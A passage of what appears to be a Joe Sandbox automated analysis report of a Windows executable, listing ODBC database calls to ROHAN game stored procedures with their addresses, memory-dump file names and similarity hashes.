                                                                                      • {? = CALL [ROHAN_GetGameHelper] (?)}, xrefs: 0043556F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_GetGameHelper] (?)}
                                                                                      • API String ID: 0-619954807
                                                                                      • Opcode ID: 2642d7e8b35fdcfae78abbebb1f1a1bca14be51424200c13a4b593034a7ec2ed
                                                                                      • Instruction ID: 2ed9ad42721400cf42c927bf26c52beb75cf9b222d93aa468c93dab096e32b57
                                                                                      • Opcode Fuzzy Hash: 2642d7e8b35fdcfae78abbebb1f1a1bca14be51424200c13a4b593034a7ec2ed
                                                                                      • Instruction Fuzzy Hash: D611DEB5A54218ABEB20DF55CC52FAA7374EB44718F204289F6186E2C4D7BAA940CB5C
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN2_DestroyGuild](?)},000000FD), ref: 0042D5E8
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042D627
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042D65C
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN2_DestroyGuild](?)}, xrefs: 0042D5DF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN2_DestroyGuild](?)}
                                                                                      • API String ID: 0-1007780442
                                                                                      • Opcode ID: 9368cb123a61a8f7cec66435179e05e9862b982eb487bd13e11ca8f0bc0bcd20
                                                                                      • Instruction ID: 84c8d159233e84e769824297301b4f2f82e2e6c377037669bc7a5713a7571c47
                                                                                      • Opcode Fuzzy Hash: 9368cb123a61a8f7cec66435179e05e9862b982eb487bd13e11ca8f0bc0bcd20
                                                                                      • Instruction Fuzzy Hash: 6111DBF5A44A18ABEB20CF54CD42FAF7374EB44B15F208289F7186F2C4D6B5A9408F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_PK_GetRewardItemOfCharacter] (?)},000000FD), ref: 0043C718
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043C757
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043C78C
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_PK_GetRewardItemOfCharacter] (?)}, xrefs: 0043C70F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_PK_GetRewardItemOfCharacter] (?)}
                                                                                      • API String ID: 0-1541250590
                                                                                      • Opcode ID: e391768a6698a1c184f4603d174057f9f757cbdbc64f1e56a6f4f04d95df0477
                                                                                      • Instruction ID: 57bd585f3d764936c142a1905468367f4419cdbb0ca462dea2665eace27aa29d
                                                                                      • Opcode Fuzzy Hash: e391768a6698a1c184f4603d174057f9f757cbdbc64f1e56a6f4f04d95df0477
                                                                                      • Instruction Fuzzy Hash: DB111EB0A4521EABFB34DF44CD42FBA7335EB84714F208299F6182E6C4C6B56D409F98
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_GetCharCompletionQuestList] (?)},000000FD), ref: 0044287E
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004428BD
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004428F2
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_GetCharCompletionQuestList] (?)}, xrefs: 00442875
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_GetCharCompletionQuestList] (?)}
                                                                                      • API String ID: 0-3492506614
                                                                                      • Opcode ID: 0aecdc04f99457aeaa2c8ade81c3e574f918ac1d7c5509c238d7e62d3c439c27
                                                                                      • Instruction ID: a73803dbc361d0226c26922dbef7e008f7b0e64fddf955e8a481681e4a330eca
                                                                                      • Opcode Fuzzy Hash: 0aecdc04f99457aeaa2c8ade81c3e574f918ac1d7c5509c238d7e62d3c439c27
                                                                                      • Instruction Fuzzy Hash: 3A112EB4E40319ABEB24CF44CC42FE97374EB44B14F2142DDF7246E6C4D6B16A818B48
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_ClearCharacterRecipe](?)},000000FD), ref: 00436821
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00436860
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00436895
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_ClearCharacterRecipe](?)}, xrefs: 00436818
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_ClearCharacterRecipe](?)}
                                                                                      • API String ID: 0-1658158914
                                                                                      • Opcode ID: bcc4fd23fa454c3160ba5c95451f4f79e65dd941f4aa7c4b5bfb9229f551eb34
                                                                                      • Instruction ID: 0d7e68c5c7c25c41238606827174e6d925e2908784614c91fbac156740d1fd5e
                                                                                      • Opcode Fuzzy Hash: bcc4fd23fa454c3160ba5c95451f4f79e65dd941f4aa7c4b5bfb9229f551eb34
                                                                                      • Instruction Fuzzy Hash: CA11BEB1A5431CABFB64DF54CC91FAA7325EB84714F20C389F6142A2C4CDB56A80CB58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_GetRank](?)},000000FD), ref: 0042C978
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042C9B7
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042C9EC
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_GetRank](?)}, xrefs: 0042C96F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_GetRank](?)}
                                                                                      • API String ID: 0-1376603591
                                                                                      • Opcode ID: d86df303a738826c0df9b0f94c2163e5c654eb8461db8d0fa8c22a26a274f111
                                                                                      • Instruction ID: 385576bbe5437345966159e20f427fdbe9ed0631967f59782479c324fd7675ae
                                                                                      • Opcode Fuzzy Hash: d86df303a738826c0df9b0f94c2163e5c654eb8461db8d0fa8c22a26a274f111
                                                                                      • Instruction Fuzzy Hash: 6D1112F1A44358ABEB20CF44CC42FAA7374EB44719F108289F7196E2C5D7B9E9408B4C
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_GetCharacterRecipeList](?)},000000FD), ref: 00436995
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004369D4
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00436A09
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_GetCharacterRecipeList](?)}, xrefs: 0043698C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_GetCharacterRecipeList](?)}
                                                                                      • API String ID: 0-4024859741
                                                                                      • Opcode ID: 8376b3bafac53a57e3487af439a64c4f191786660ed94fe26d26243a4610edaa
                                                                                      • Instruction ID: 220e7a20d06c4901f07e99bcd0a747f1ad4d56e28ea46f1659e1fd1e98431aea
                                                                                      • Opcode Fuzzy Hash: 8376b3bafac53a57e3487af439a64c4f191786660ed94fe26d26243a4610edaa
                                                                                      • Instruction Fuzzy Hash: 6A110CB5A40618ABFB24CF54CC52FAA7374FB44B15F204389F618AA2C0DAB579808F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_GetNGuildWarRegisterList] (?)},000000FD), ref: 004339E4
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00433A23
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00433A58
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_GetNGuildWarRegisterList] (?)}, xrefs: 004339DB
